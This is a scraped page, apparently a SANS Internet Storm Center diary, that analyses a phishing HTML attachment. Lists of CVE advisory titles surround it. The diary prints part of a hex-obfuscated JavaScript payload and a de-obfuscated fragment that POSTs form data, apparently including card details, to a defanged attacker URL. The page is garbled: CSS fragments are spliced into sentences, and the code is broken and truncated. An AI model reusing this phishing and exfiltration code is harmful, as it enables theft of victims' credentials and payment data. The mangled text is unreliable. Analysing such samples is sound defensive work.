NTP CVE-2017-6459 Local Denial of Service Vulnerability
IBM WebSphere Portal CVE-2017-1120 Cross Site Scripting Vulnerability
IBM Kenexa LMS on Cloud CVE-2016-8935 Cross-Site Scripting Vulnerability
NTP CVE-2017-6452 Local Stack Based Buffer Overflow Vulnerability
OpenJPEG CVE-2016-9573 Out of Bounds Read Denial of Service Vulnerability
QNAP QTAP Qualcomm components Multiple Unspecified Security Vulnerabilities
TYPO3 CVE-2017-6370 Information Disclosure Vulnerability
Samba CVE-2016-2126 Denial of Service Vulnerability
Firebird CVE-2017-6369 Remote Code Execution Vulnerability
Chef Manage CVE-2017-7174 Remote Code Execution Vulnerability
GNU BinUtils CVE-2017-6969 Remote Denial of Service Vulnerability
libpcre Multiple Security Vulnerabilities
Cloudera CDH CVE-2013-6446 Information Disclosure Vulnerability
SLiMS 7 Cendana CVE-2017-7242 Multiple Cross Site Scripting Vulnerabilities
IBM TRIRIGA Application Platform CVE-2016-9737 Unspecified Cross Site Scripting Vulnerability
Redhat Wildfly CVE-2016-9589 Denial of Service Vulnerability
MySQL CVE-2017-3305 Man in the Middle Security Bypass Vulnerability
Multiple AVG Products CVE-2017-5566 DLL Loading Local Code Injection Vulnerability
Samba CVE-2017-2619 Symlink Vulnerability
QNAP QTS Multiple Arbitrary Command Execution Vulnerabilities

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily padding:5px 10px"> var iKz7xb8 = 160b6e65697e737a6f0a627e67661416425e47460a464b444d17084f44081416424f4b4e1416 474f5e4b0a49424b58594f5e17085f5e4c0712081416474f5e4b0a444b474f17085c434f5d5a45585e080a49454 45e4f445e17085d434e5e42174e4f5c43494f075d434e5e42060a4344435e434b460759494b464f171b08141646 4344410a42584f4c1708425e5e5a591005054c45445e59044d45454d464f4b5a43590449454705495959154c4b4 743465317784548455e45080a584f461708595e53464f59424f4f5e08140a16595e53464f1400514c45445e074c 4b47434653100a0d784548455e450d060a5 ...

The file has a current VT score of 0/55 [1] and isfree width:808px" />

The HTTP form data are sent to a rogue server but how to get it? To obtain more details about the malicious JavaScript code, it can be de-obfuscated with JSDetox[2] and some manual changes. The complete code can now be padding:5px 10px"> input type=button class=ssP onClick=ss() value=Submit Form ... function ss(){ if (!TLSPort()){ window.location.replace(https://www.paypal.com/ } var GoogleAnalytics=hxxp://www.eurodyte.net/ + 86c2e66377265675a8a0edc1befe1837.php document.forms[pFdocument.forms[pF].method=POST document.forms[pF if (!v || !w || !x || y==00 || z==00x=x.replace(/\D/g, n if (be){ if ((nd *=2) be=!be } return (nn % 10)==0 }

Here is a valid POST to the attacker width:800px" />


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

NTP CVE-2017-6451 Local Denial of Service Vulnerability
Multiple BD Products CVE-2017-6022 Hardcoded Credentials Information Disclosure Vulnerability
GNU glibc '__res_vinit()' Function Information Disclosure Vulnerability
GNU glibc CVE-2016-6323 Infinite Loop Denial of Service Vulnerability
GNU glibc 'libio/wstrops.c' Local Integer Overflow Vulnerability
GNU glibc CVE-2016-1234 Local Buffer Overflow Vulnerability
Broadcom BCM4339 SoC CVE-2017-6957 Stack-Based Buffer Overflow Vulnerability
APNGDis Multiple Buffer Overflow Vulnerabilities
Internet Storm Center Infocon Status